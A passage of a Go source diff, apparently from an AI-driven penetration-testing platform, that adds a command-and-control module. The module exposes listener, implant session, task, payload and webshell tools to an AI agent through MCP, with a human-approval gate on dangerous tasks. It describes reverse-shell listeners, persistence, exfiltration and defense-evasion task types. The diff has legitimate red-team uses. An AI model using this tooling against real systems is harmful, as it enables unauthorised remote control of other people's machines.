||||
mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(cfg.Agent.ToolTimeoutMinutes)
|
||||
|
||||
// 创建安全工具执行器
|
||||
executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger)
|
||||
@@ -338,6 +345,15 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
|
||||
skillsHandler.SetDB(db) // 设置数据库连接以便获取调用统计
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 初始化 C2 模块(可按配置关闭,节省本机部署资源)
|
||||
// ============================================================================
|
||||
c2Manager, c2Watchdog, watchdogCancel := setupC2Runtime(cfg, db, agentHandler, log.Logger)
|
||||
if c2Manager != nil {
|
||||
registerC2Tools(mcpServer, c2Manager, log.Logger, cfg.Server.Port)
|
||||
}
|
||||
c2Handler := handler.NewC2Handler(c2Manager, log.Logger)
|
||||
|
||||
// 创建OpenAPI处理器
|
||||
conversationHandler := handler.NewConversationHandler(db, log.Logger)
|
||||
robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger)
|
||||
@@ -361,6 +377,10 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
|
||||
knowledgeHandler: knowledgeHandler,
|
||||
agentHandler: agentHandler,
|
||||
robotHandler: robotHandler,
|
||||
c2Manager: c2Manager,
|
||||
c2Watchdog: c2Watchdog,
|
||||
c2WatchdogCancel: watchdogCancel,
|
||||
c2Handler: c2Handler,
|
||||
}
|
||||
// 飞书/钉钉长连接(无需公网),启用时在后台启动;后续前端应用配置时会通过 RestartRobotConnections 重启
|
||||
app.startRobotConnections()
|
||||
@@ -429,6 +449,14 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
|
||||
// 设置机器人连接重启器,前端应用配置后无需重启服务即可使钉钉/飞书新配置生效
|
||||
configHandler.SetRobotRestarter(app)
|
||||
|
||||
configHandler.SetC2Runtime(app)
|
||||
configHandler.SetC2ToolRegistrar(func() error {
|
||||
if app.config.C2.EnabledEffective() && app.c2Manager != nil {
|
||||
registerC2Tools(mcpServer, app.c2Manager, log.Logger, app.config.Server.Port)
|
||||
}
|
||||
return nil
|
||||
})
|
||||
|
||||
// 设置路由(使用 App 实例以便动态获取 handler)
|
||||
setupRoutes(
|
||||
router,
|
||||
@@ -451,6 +479,7 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
|
||||
markdownAgentsHandler,
|
||||
fofaHandler,
|
||||
terminalHandler,
|
||||
app.c2Handler,
|
||||
mcpServer,
|
||||
authManager,
|
||||
openAPIHandler,
|
||||
@@ -530,6 +559,10 @@ func (a *App) RunWithContext(ctx context.Context) error {
|
||||
|
||||
// Shutdown 关闭应用
|
||||
func (a *App) Shutdown() {
|
||||
shutdownCtx, shutdownCancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
_ = einoobserve.ShutdownOtel(shutdownCtx)
|
||||
shutdownCancel()
|
||||
|
||||
// 停止钉钉/飞书长连接
|
||||
a.robotMu.Lock()
|
||||
if a.dingCancel != nil {
|
||||
@@ -542,6 +575,8 @@ func (a *App) Shutdown() {
|
||||
}
|
||||
a.robotMu.Unlock()
|
||||
|
||||
a.shutdownC2()
|
||||
|
||||
// 停止所有外部MCP客户端
|
||||
if a.externalMCPMgr != nil {
|
||||
a.externalMCPMgr.StopAll()
|
||||
@@ -570,12 +605,12 @@ func (a *App) startRobotConnections() {
|
||||
if cfg.Robots.Lark.Enabled && cfg.Robots.Lark.AppID != "" && cfg.Robots.Lark.AppSecret != "" {
|
||||
ctx, cancel := context.WithCancel(context.Background())
|
||||
a.larkCancel = cancel
|
||||
go robot.StartLark(ctx, cfg.Robots.Lark, a.robotHandler, a.logger.Logger)
|
||||
go robot.StartLark(ctx, cfg.Robots, a.robotHandler, a.logger.Logger)
|
||||
}
|
||||
if cfg.Robots.Dingtalk.Enabled && cfg.Robots.Dingtalk.ClientID != "" && cfg.Robots.Dingtalk.ClientSecret != "" {
|
||||
ctx, cancel := context.WithCancel(context.Background())
|
||||
a.dingCancel = cancel
|
||||
go robot.StartDing(ctx, cfg.Robots.Dingtalk, a.robotHandler, a.logger.Logger)
|
||||
go robot.StartDing(ctx, cfg.Robots, a.robotHandler, a.logger.Logger)
|
||||
}
|
||||
}
|
||||
|
||||
@@ -618,6 +653,7 @@ func setupRoutes(
|
||||
markdownAgentsHandler *handler.MarkdownAgentsHandler,
|
||||
fofaHandler *handler.FofaHandler,
|
||||
terminalHandler *handler.TerminalHandler,
|
||||
c2Handler *handler.C2Handler,
|
||||
mcpServer *mcp.Server,
|
||||
authManager *security.AuthManager,
|
||||
openAPIHandler *handler.OpenAPIHandler,
|
||||
@@ -727,6 +763,7 @@ func setupRoutes(
|
||||
// 监控
|
||||
protected.GET("/monitor", monitorHandler.Monitor)
|
||||
protected.GET("/monitor/execution/:id", monitorHandler.GetExecution)
|
||||
protected.POST("/monitor/execution/:id/cancel", monitorHandler.CancelExecution)
|
||||
protected.POST("/monitor/executions/names", monitorHandler.BatchGetToolNames)
|
||||
protected.DELETE("/monitor/execution/:id", monitorHandler.DeleteExecution)
|
||||
protected.DELETE("/monitor/executions", monitorHandler.DeleteExecutions)
|
||||
@@ -927,6 +964,52 @@ func setupRoutes(
|
||||
protected.POST("/webshell/exec", webshellHandler.Exec)
|
||||
protected.POST("/webshell/file", webshellHandler.FileOp)
|
||||
|
||||
// C2 管理(未启用时返回 503,避免 Handler 空指针)
|
||||
c2Routes := protected.Group("/c2")
|
||||
c2Routes.Use(func(c *gin.Context) {
|
||||
if app.c2Manager == nil {
|
||||
c.AbortWithStatusJSON(http.StatusServiceUnavailable, gin.H{
|
||||
"error": "c2_disabled",
|
||||
"message": "C2 功能已在系统设置中关闭",
|
||||
"enabled": false,
|
||||
})
|
||||
return
|
||||
}
|
||||
c.Next()
|
||||
})
|
||||
c2Routes.GET("/listeners", c2Handler.ListListeners)
|
||||
c2Routes.POST("/listeners", c2Handler.CreateListener)
|
||||
c2Routes.GET("/listeners/:id", c2Handler.GetListener)
|
||||
c2Routes.PUT("/listeners/:id", c2Handler.UpdateListener)
|
||||
c2Routes.DELETE("/listeners/:id", c2Handler.DeleteListener)
|
||||
c2Routes.POST("/listeners/:id/start", c2Handler.StartListener)
|
||||
c2Routes.POST("/listeners/:id/stop", c2Handler.StopListener)
|
||||
c2Routes.GET("/sessions", c2Handler.ListSessions)
|
||||
c2Routes.GET("/sessions/:id", c2Handler.GetSession)
|
||||
c2Routes.DELETE("/sessions/:id", c2Handler.DeleteSession)
|
||||
c2Routes.PUT("/sessions/:id/sleep", c2Handler.SetSessionSleep)
|
||||
c2Routes.GET("/tasks", c2Handler.ListTasks)
|
||||
c2Routes.DELETE("/tasks", c2Handler.DeleteTasks)
|
||||
c2Routes.GET("/tasks/:id", c2Handler.GetTask)
|
||||
c2Routes.POST("/tasks", c2Handler.CreateTask)
|
||||
c2Routes.POST("/tasks/:id/cancel", c2Handler.CancelTask)
|
||||
c2Routes.GET("/tasks/:id/wait", c2Handler.WaitTask)
|
||||
c2Routes.POST("/sessions/:id/tasks", c2Handler.CreateTask)
|
||||
c2Routes.POST("/payloads/oneliner", c2Handler.PayloadOneliner)
|
||||
c2Routes.POST("/payloads/build", c2Handler.PayloadBuild)
|
||||
c2Routes.GET("/payloads/:id/download", c2Handler.PayloadDownload)
|
||||
c2Routes.GET("/events", c2Handler.ListEvents)
|
||||
c2Routes.DELETE("/events", c2Handler.DeleteEvents)
|
||||
c2Routes.GET("/events/stream", c2Handler.EventStream)
|
||||
c2Routes.POST("/files/upload", c2Handler.UploadFileForImplant)
|
||||
c2Routes.GET("/files", c2Handler.ListFiles)
|
||||
c2Routes.GET("/tasks/:id/result-file", c2Handler.DownloadResultFile)
|
||||
c2Routes.GET("/profiles", c2Handler.ListProfiles)
|
||||
c2Routes.GET("/profiles/:id", c2Handler.GetProfile)
|
||||
c2Routes.POST("/profiles", c2Handler.CreateProfile)
|
||||
c2Routes.PUT("/profiles/:id", c2Handler.UpdateProfile)
|
||||
c2Routes.DELETE("/profiles/:id", c2Handler.DeleteProfile)
|
||||
|
||||
// 对话附件(chat_uploads)管理
|
||||
protected.GET("/chat-uploads", chatUploadsHandler.List)
|
||||
protected.GET("/chat-uploads/download", chatUploadsHandler.Download)
|
||||
|
||||
@@ -0,0 +1,228 @@
|
||||
package app
|
||||
|
||||
import (
|
||||
"context"
|
||||
"database/sql"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/c2"
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// C2HITLBridge 实现 C2 Manager 的 HITLBridge 接口,将危险任务桥接到现有 HITL 审批流。
|
||||
// 审批记录写入 hitl_interrupts 表,与现有 HITL 系统共享前端审批 UI。
|
||||
type C2HITLBridge struct {
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
timeout time.Duration
|
||||
getConvID func() string
|
||||
}
|
||||
|
||||
// NewC2HITLBridge 创建 C2 HITL 桥
|
||||
func NewC2HITLBridge(db *database.DB, logger *zap.Logger) *C2HITLBridge {
|
||||
return &C2HITLBridge{
|
||||
db: db,
|
||||
logger: logger,
|
||||
timeout: 5 * time.Minute,
|
||||
getConvID: func() string { return "" },
|
||||
}
|
||||
}
|
||||
|
||||
// SetConversationIDGetter 设置获取当前对话 ID 的函数
|
||||
func (b *C2HITLBridge) SetConversationIDGetter(fn func() string) {
|
||||
b.getConvID = fn
|
||||
}
|
||||
|
||||
// SetTimeout 设置审批超时(0 表示不超时)
|
||||
func (b *C2HITLBridge) SetTimeout(d time.Duration) {
|
||||
b.timeout = d
|
||||
}
|
||||
|
||||
// RequestApproval 实现 HITLBridge 接口:写入 hitl_interrupts 表并轮询等待审批结果
|
||||
func (b *C2HITLBridge) RequestApproval(ctx context.Context, req c2.HITLApprovalRequest) error {
|
||||
interruptID := "hitl_c2_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
|
||||
now := time.Now()
|
||||
|
||||
convID := req.ConversationID
|
||||
if convID == "" {
|
||||
convID = b.getConvID()
|
||||
}
|
||||
if convID == "" {
|
||||
convID = "c2_system"
|
||||
}
|
||||
|
||||
payload, _ := json.Marshal(map[string]interface{}{
|
||||
"task_id": req.TaskID,
|
||||
"session_id": req.SessionID,
|
||||
"task_type": req.TaskType,
|
||||
"payload": req.PayloadJSON,
|
||||
"source": req.Source,
|
||||
"reason": req.Reason,
|
||||
"c2_operation": true,
|
||||
})
|
||||
|
||||
_, err := b.db.Exec(`INSERT INTO hitl_interrupts
|
||||
(id, conversation_id, message_id, mode, tool_name, tool_call_id, payload, status, created_at)
|
||||
VALUES (?, ?, ?, ?, ?, ?, ?, 'pending', ?)`,
|
||||
interruptID, convID, "", "approval",
|
||||
c2.MCPToolC2Task, req.TaskID,
|
||||
string(payload), now,
|
||||
)
|
||||
if err != nil {
|
||||
b.logger.Error("C2 HITL: 创建审批记录失败,拒绝执行", zap.Error(err))
|
||||
return fmt.Errorf("C2 HITL 审批记录创建失败,安全起见拒绝执行: %w", err)
|
||||
}
|
||||
|
||||
b.logger.Info("C2 HITL: 等待人工审批",
|
||||
zap.String("interrupt_id", interruptID),
|
||||
zap.String("task_id", req.TaskID),
|
||||
zap.String("task_type", req.TaskType),
|
||||
)
|
||||
|
||||
// Poll DB waiting for decision
|
||||
ticker := time.NewTicker(500 * time.Millisecond)
|
||||
defer ticker.Stop()
|
||||
|
||||
var deadline <-chan time.Time
|
||||
if b.timeout > 0 {
|
||||
timer := time.NewTimer(b.timeout)
|
||||
defer timer.Stop()
|
||||
deadline = timer.C
|
||||
}
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
_, _ = b.db.Exec(`UPDATE hitl_interrupts SET status='cancelled', decision='reject',
|
||||
decision_comment='context cancelled', decided_at=? WHERE id=? AND status='pending'`,
|
||||
time.Now(), interruptID)
|
||||
return ctx.Err()
|
||||
|
||||
case <-deadline:
|
||||
_, _ = b.db.Exec(`UPDATE hitl_interrupts SET status='timeout', decision='reject',
|
||||
decision_comment='C2 HITL timeout auto-reject for safety', decided_at=? WHERE id=? AND status='pending'`,
|
||||
time.Now(), interruptID)
|
||||
b.logger.Warn("C2 HITL: 审批超时,安全起见拒绝执行", zap.String("interrupt_id", interruptID))
|
||||
return fmt.Errorf("C2 HITL 审批超时,危险任务已被自动拒绝")
|
||||
|
||||
case <-ticker.C:
|
||||
var status, decision string
|
||||
err := b.db.QueryRow(`SELECT status, COALESCE(decision, '') FROM hitl_interrupts WHERE id = ?`,
|
||||
interruptID).Scan(&status, &decision)
|
||||
if err != nil {
|
||||
if err == sql.ErrNoRows {
|
||||
return nil
|
||||
}
|
||||
continue
|
||||
}
|
||||
switch status {
|
||||
case "decided", "timeout":
|
||||
if decision == "reject" {
|
||||
return fmt.Errorf("C2 危险任务被人工拒绝")
|
||||
}
|
||||
return nil
|
||||
case "cancelled":
|
||||
return fmt.Errorf("C2 审批已取消")
|
||||
case "pending":
|
||||
continue
|
||||
default:
|
||||
continue
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// C2HooksConfig 配置 C2 Manager 的 Hooks
|
||||
type C2HooksConfig struct {
|
||||
DB *database.DB
|
||||
Logger *zap.Logger
|
||||
AttackChainRecord func(session *database.C2Session, phase string, description string)
|
||||
VulnRecord func(session *database.C2Session, title string, severity string)
|
||||
}
|
||||
|
||||
// SetupC2Hooks 设置 C2 Manager 的业务钩子
|
||||
func SetupC2Hooks(cfg *C2HooksConfig) c2.Hooks {
|
||||
return c2.Hooks{
|
||||
OnSessionFirstSeen: func(session *database.C2Session) {
|
||||
// 新会话上线
|
||||
cfg.Logger.Info("C2 Session first seen",
|
||||
zap.String("session_id", session.ID),
|
||||
zap.String("hostname", session.Hostname),
|
||||
zap.String("os", session.OS),
|
||||
zap.String("arch", session.Arch),
|
||||
)
|
||||
|
||||
// 记录漏洞(初始访问点)
|
||||
if cfg.VulnRecord != nil {
|
||||
cfg.VulnRecord(session, fmt.Sprintf("C2 Session Established: %s@%s", session.Username, session.Hostname), "high")
|
||||
}
|
||||
|
||||
// 记录攻击链(Initial Access)
|
||||
if cfg.AttackChainRecord != nil {
|
||||
cfg.AttackChainRecord(session, "initial-access", fmt.Sprintf("Implant beacon from %s/%s", session.Hostname, session.InternalIP))
|
||||
}
|
||||
},
|
||||
OnTaskCompleted: func(task *database.C2Task, sessionID string) {
|
||||
// 任务完成
|
||||
cfg.Logger.Debug("C2 Task completed",
|
||||
zap.String("task_id", task.ID),
|
||||
zap.String("task_type", task.TaskType),
|
||||
zap.String("status", task.Status),
|
||||
)
|
||||
|
||||
// 根据任务类型记录攻击链
|
||||
if cfg.AttackChainRecord != nil {
|
||||
session, _ := cfg.DB.GetC2Session(sessionID)
|
||||
if session != nil {
|
||||
phase := taskToAttackPhase(task.TaskType)
|
||||
if phase != "" {
|
||||
cfg.AttackChainRecord(session, phase, fmt.Sprintf("Task %s: %s", task.TaskType, task.Status))
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// taskToAttackPhase 将任务类型映射到 ATT&CK 阶段
|
||||
func taskToAttackPhase(taskType string) string {
|
||||
switch taskType {
|
||||
case "exec", "shell":
|
||||
return "execution"
|
||||
case "upload":
|
||||
return "persistence"
|
||||
case "download":
|
||||
return "exfiltration"
|
||||
case "screenshot":
|
||||
return "collection"
|
||||
case "kill_proc":
|
||||
return "impact"
|
||||
case "port_fwd", "socks_start":
|
||||
return "lateral-movement"
|
||||
case "load_assembly":
|
||||
return "defense-evasion"
|
||||
case "persist":
|
||||
return "persistence"
|
||||
case "self_delete":
|
||||
return "defense-evasion"
|
||||
default:
|
||||
return "execution"
|
||||
}
|
||||
}
|
||||
|
||||
// SetupC2HITLBridgeWithAgent 设置 HITL 桥接器
|
||||
// 这个函数将由 App 调用,注入必要的依赖
|
||||
func SetupC2HITLBridgeWithAgent(db *database.DB, logger *zap.Logger) c2.HITLBridge {
|
||||
return &C2HITLBridge{
|
||||
db: db,
|
||||
logger: logger,
|
||||
timeout: 5 * time.Minute,
|
||||
getConvID: func() string { return "" },
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,104 @@
|
||||
package app
|
||||
|
||||
import (
|
||||
"context"
|
||||
|
||||
"cyberstrike-ai/internal/c2"
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/handler"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// setupC2Runtime 创建 C2 Manager、看门狗与取消函数;不注册 MCP 工具(由 Apply 统一 ClearTools 后注册)。
|
||||
func setupC2Runtime(
|
||||
cfg *config.Config,
|
||||
db *database.DB,
|
||||
agentHandler *handler.AgentHandler,
|
||||
logger *zap.Logger,
|
||||
) (*c2.Manager, *c2.SessionWatchdog, context.CancelFunc) {
|
||||
if !cfg.C2.EnabledEffective() {
|
||||
return nil, nil, nil
|
||||
}
|
||||
c2Manager := c2.NewManager(db, logger, "tmp/c2")
|
||||
c2Manager.Registry().Register(string(c2.ListenerTypeTCPReverse), c2.NewTCPReverseListener)
|
||||
c2Manager.Registry().Register(string(c2.ListenerTypeHTTPBeacon), c2.NewHTTPBeaconListener)
|
||||
c2Manager.Registry().Register(string(c2.ListenerTypeHTTPSBeacon), c2.NewHTTPSBeaconListener)
|
||||
c2Manager.Registry().Register(string(c2.ListenerTypeWebSocket), c2.NewWebSocketListener)
|
||||
c2HITLBridge := NewC2HITLBridge(db, logger)
|
||||
c2Manager.SetHITLBridge(c2HITLBridge)
|
||||
c2Manager.SetHITLDangerousGate(func(conversationID, toolName string) bool {
|
||||
return agentHandler.HITLNeedsToolApproval(conversationID, toolName)
|
||||
})
|
||||
c2Hooks := SetupC2Hooks(&C2HooksConfig{
|
||||
DB: db,
|
||||
Logger: logger,
|
||||
AttackChainRecord: func(session *database.C2Session, phase string, description string) {
|
||||
logger.Info("C2 Attack Chain",
|
||||
zap.String("session_id", session.ID),
|
||||
zap.String("phase", phase),
|
||||
zap.String("desc", description),
|
||||
)
|
||||
},
|
||||
VulnRecord: func(session *database.C2Session, title string, severity string) {
|
||||
logger.Info("C2 Vulnerability",
|
||||
zap.String("session_id", session.ID),
|
||||
zap.String("title", title),
|
||||
zap.String("severity", severity),
|
||||
)
|
||||
},
|
||||
})
|
||||
c2Manager.SetHooks(c2Hooks)
|
||||
c2Manager.RestoreRunningListeners()
|
||||
c2Watchdog := c2.NewSessionWatchdog(c2Manager)
|
||||
watchdogCtx, watchdogCancel := context.WithCancel(context.Background())
|
||||
go c2Watchdog.Run(watchdogCtx)
|
||||
return c2Manager, c2Watchdog, watchdogCancel
|
||||
}
|
||||
|
||||
// ReconcileC2AfterConfigApply 根据当前内存配置启停 C2(不写盘;在 Apply 中 ClearTools 之前调用)。
|
||||
func (a *App) ReconcileC2AfterConfigApply() error {
|
||||
if !a.config.C2.EnabledEffective() {
|
||||
a.shutdownC2()
|
||||
return nil
|
||||
}
|
||||
if a.c2Manager != nil {
|
||||
return nil
|
||||
}
|
||||
if a.db == nil || a.agentHandler == nil {
|
||||
return nil
|
||||
}
|
||||
m, wd, cancel := setupC2Runtime(a.config, a.db, a.agentHandler, a.logger.Logger)
|
||||
if m == nil {
|
||||
return nil
|
||||
}
|
||||
a.c2Manager = m
|
||||
a.c2Watchdog = wd
|
||||
a.c2WatchdogCancel = cancel
|
||||
if a.c2Handler != nil {
|
||||
a.c2Handler.SetManager(m)
|
||||
}
|
||||
a.logger.Info("C2 子系统已按配置启动")
|
||||
return nil
|
||||
}
|
||||
|
||||
// shutdownC2 停止看门狗与所有监听器,并断开 Handler 引用。
|
||||
func (a *App) shutdownC2() {
|
||||
had := a.c2WatchdogCancel != nil || a.c2Manager != nil
|
||||
if a.c2WatchdogCancel != nil {
|
||||
a.c2WatchdogCancel()
|
||||
a.c2WatchdogCancel = nil
|
||||
}
|
||||
a.c2Watchdog = nil
|
||||
if a.c2Manager != nil {
|
||||
a.c2Manager.Close()
|
||||
a.c2Manager = nil
|
||||
}
|
||||
if a.c2Handler != nil {
|
||||
a.c2Handler.SetManager(nil)
|
||||
}
|
||||
if had {
|
||||
a.logger.Info("C2 子系统已关闭")
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,861 @@
|
||||
package app
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/agent"
|
||||
"cyberstrike-ai/internal/c2"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/mcp/builtin"
|
||||
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// registerC2Tools 注册所有 C2 MCP 工具(合并同类项,减少工具数量以节省上下文 token)。
|
||||
// webListenPort 为本进程 Web/API 监听端口(配置 server.port,启动时已加载),用于 MCP 描述中提示勿与 C2 bind_port 冲突。
|
||||
func registerC2Tools(mcpServer *mcp.Server, c2Manager *c2.Manager, logger *zap.Logger, webListenPort int) {
|
||||
registerC2ListenerTool(mcpServer, c2Manager, logger, webListenPort)
|
||||
registerC2SessionTool(mcpServer, c2Manager, logger)
|
||||
registerC2TaskTool(mcpServer, c2Manager, logger)
|
||||
registerC2TaskManageTool(mcpServer, c2Manager, logger)
|
||||
registerC2PayloadTool(mcpServer, c2Manager, logger, webListenPort)
|
||||
registerC2EventTool(mcpServer, c2Manager, logger)
|
||||
registerC2ProfileTool(mcpServer, c2Manager, logger)
|
||||
registerC2FileTool(mcpServer, c2Manager, logger)
|
||||
logger.Info("C2 MCP tools registered (8 unified tools)")
|
||||
}
|
||||
|
||||
func makeC2Result(data interface{}, err error) (*mcp.ToolResult, error) {
|
||||
if err != nil {
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{{Type: "text", Text: err.Error()}},
|
||||
IsError: true,
|
||||
}, nil
|
||||
}
|
||||
text, _ := json.Marshal(data)
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{{Type: "text", Text: string(text)}},
|
||||
}, nil
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// c2_listener — 监听器统一工具
|
||||
// ============================================================================
|
||||
|
||||
func registerC2ListenerTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListenPort int) {
|
||||
s.RegisterTool(mcp.Tool{
|
||||
Name: builtin.ToolC2Listener,
|
||||
Description: fmt.Sprintf(`C2 监听器管理。通过 action 参数选择操作:
|
||||
- list: 列出所有监听器
|
||||
- get: 获取监听器详情(需 listener_id)
|
||||
- create: 创建监听器(需 name, type, bind_port)。成功时除 listener 外会返回 implant_token(仅此一次,用于 X-Implant-Token / oneliner;list/get/start 不再返回)
|
||||
- update: 更新监听器配置(需 listener_id,可改 name/bind_host/bind_port/remark/config/callback_host)
|
||||
- start: 启动监听器(需 listener_id)
|
||||
- stop: 停止监听器(需 listener_id)
|
||||
- delete: 删除监听器(需 listener_id)
|
||||
监听器类型: tcp_reverse, http_beacon, https_beacon, websocket
|
||||
端口约束:create/update 的 bind_port 禁止与本平台 Web/API 所用端口相同。当前本服务该端口为 %d(配置项 server.port,随进程启动从配置文件加载)。若 bind_port 与此相同会导致本服务或监听器 bind 失败、Beacon/oneliner 误连到 Web 而非 C2。请为监听器另选空闲端口。`, webListenPort),
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"action": map[string]interface{}{"type": "string", "description": "操作: list/get/create/update/start/stop/delete", "enum": []string{"list", "get", "create", "update", "start", "stop", "delete"}},
|
||||
"listener_id": map[string]interface{}{"type": "string", "description": "监听器 ID(get/update/start/stop/delete 需要)"},
|
||||
"name": map[string]interface{}{"type": "string", "description": "监听器名称(create/update)"},
|
||||
"type": map[string]interface{}{"type": "string", "description": "监听器类型(create)", "enum": []string{"tcp_reverse", "http_beacon", "https_beacon", "websocket"}},
|
||||
"bind_host": map[string]interface{}{"type": "string", "description": "绑定地址,默认 127.0.0.1;外网监听常用 0.0.0.0"},
|
||||
"callback_host": map[string]interface{}{"type": "string", "description": "可选:植入端/Payload 回连主机名(公网 IP 或域名)。写入 config_json;生成 oneliner/beacon 时优先于 bind_host。update 时传入空字符串可清除"},
|
||||
"bind_port": map[string]interface{}{"type": "integer", "description": fmt.Sprintf("绑定端口(create 必填)。须 ≠ %d(当前本服务 Web/API 端口,配置 server.port)", webListenPort), "minimum": 1, "maximum": 65535},
|
||||
"profile_id": map[string]interface{}{"type": "string", "description": "Malleable Profile ID"},
|
||||
"remark": map[string]interface{}{"type": "string", "description": "备注"},
|
||||
"config": map[string]interface{}{"type": "object", "description": "高级配置(beacon 路径/TLS/OPSEC 等),create/update 可用"},
|
||||
},
|
||||
"required": []string{"action"},
|
||||
},
|
||||
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
action := getString(params, "action")
|
||||
id := getString(params, "listener_id")
|
||||
|
||||
switch action {
|
||||
case "list":
|
||||
listeners, err := m.DB().ListC2Listeners()
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
for _, li := range listeners {
|
||||
li.EncryptionKey = ""
|
||||
li.ImplantToken = ""
|
||||
}
|
||||
return makeC2Result(map[string]interface{}{"listeners": listeners, "count": len(listeners)}, nil)
|
||||
|
||||
case "get":
|
||||
listener, err := m.DB().GetC2Listener(id)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
if listener == nil {
|
||||
return makeC2Result(nil, fmt.Errorf("listener not found"))
|
||||
}
|
||||
listener.EncryptionKey = ""
|
||||
listener.ImplantToken = ""
|
||||
return makeC2Result(map[string]interface{}{"listener": listener}, nil)
|
||||
|
||||
case "create":
|
||||
var cfg *c2.ListenerConfig
|
||||
if cfgRaw, ok := params["config"]; ok && cfgRaw != nil {
|
||||
cfgBytes, _ := json.Marshal(cfgRaw)
|
||||
cfg = &c2.ListenerConfig{}
|
||||
_ = json.Unmarshal(cfgBytes, cfg)
|
||||
}
|
||||
input := c2.CreateListenerInput{
|
||||
Name: getString(params, "name"),
|
||||
Type: getString(params, "type"),
|
||||
BindHost: getString(params, "bind_host"),
|
||||
BindPort: int(getFloat64(params, "bind_port")),
|
||||
ProfileID: getString(params, "profile_id"),
|
||||
Remark: getString(params, "remark"),
|
||||
Config: cfg,
|
||||
CallbackHost: getString(params, "callback_host"),
|
||||
}
|
||||
listener, err := m.CreateListener(input)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
implantToken := listener.ImplantToken
|
||||
listener.EncryptionKey = ""
|
||||
listener.ImplantToken = ""
|
||||
return makeC2Result(map[string]interface{}{
|
||||
"listener": listener,
|
||||
"implant_token": implantToken,
|
||||
}, nil)
|
||||
|
||||
case "update":
|
||||
listener, err := m.DB().GetC2Listener(id)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
if listener == nil {
|
||||
return makeC2Result(nil, fmt.Errorf("listener not found"))
|
||||
}
|
||||
if m.IsListenerRunning(id) {
|
||||
newHost := getString(params, "bind_host")
|
||||
newPort := int(getFloat64(params, "bind_port"))
|
||||
if (newHost != "" && newHost != listener.BindHost) || (newPort > 0 && newPort != listener.BindPort) {
|
||||
return makeC2Result(nil, fmt.Errorf("cannot modify bind address while listener is running"))
|
||||
}
|
||||
}
|
||||
if v := getString(params, "name"); v != "" {
|
||||
listener.Name = v
|
||||
}
|
||||
if v := getString(params, "bind_host"); v != "" {
|
||||
listener.BindHost = v
|
||||
}
|
||||
if v := int(getFloat64(params, "bind_port")); v > 0 {
|
||||
listener.BindPort = v
|
||||
}
|
||||
if v := getString(params, "profile_id"); v != "" {
|
||||
listener.ProfileID = v
|
||||
}
|
||||
if v, ok := params["remark"]; ok {
|
||||
listener.Remark, _ = v.(string)
|
||||
}
|
||||
if cfgRaw, ok := params["config"]; ok && cfgRaw != nil {
|
||||
cfgBytes, _ := json.Marshal(cfgRaw)
|
||||
listener.ConfigJSON = string(cfgBytes)
|
||||
}
|
||||
if _, ok := params["callback_host"]; ok {
|
||||
pcfg := &c2.ListenerConfig{}
|
||||
raw := strings.TrimSpace(listener.ConfigJSON)
|
||||
if raw == "" {
|
||||
raw = "{}"
|
||||
}
|
||||
_ = json.Unmarshal([]byte(raw), pcfg)
|
||||
pcfg.CallbackHost = strings.TrimSpace(getString(params, "callback_host"))
|
||||
pcfg.ApplyDefaults()
|
||||
cfgBytes, err := json.Marshal(pcfg)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
listener.ConfigJSON = string(cfgBytes)
|
||||
}
|
||||
if err := m.DB().UpdateC2Listener(listener); err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
listener.EncryptionKey = ""
|
||||
listener.ImplantToken = ""
|
||||
return makeC2Result(map[string]interface{}{"listener": listener}, nil)
|
||||
|
||||
case "start":
|
||||
listener, err := m.StartListener(id)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
listener.EncryptionKey = ""
|
||||
listener.ImplantToken = ""
|
||||
return makeC2Result(map[string]interface{}{"listener": listener}, nil)
|
||||
|
||||
case "stop":
|
||||
err := m.StopListener(id)
|
||||
return makeC2Result(map[string]interface{}{"stopped": err == nil}, err)
|
||||
|
||||
case "delete":
|
||||
err := m.DeleteListener(id)
|
||||
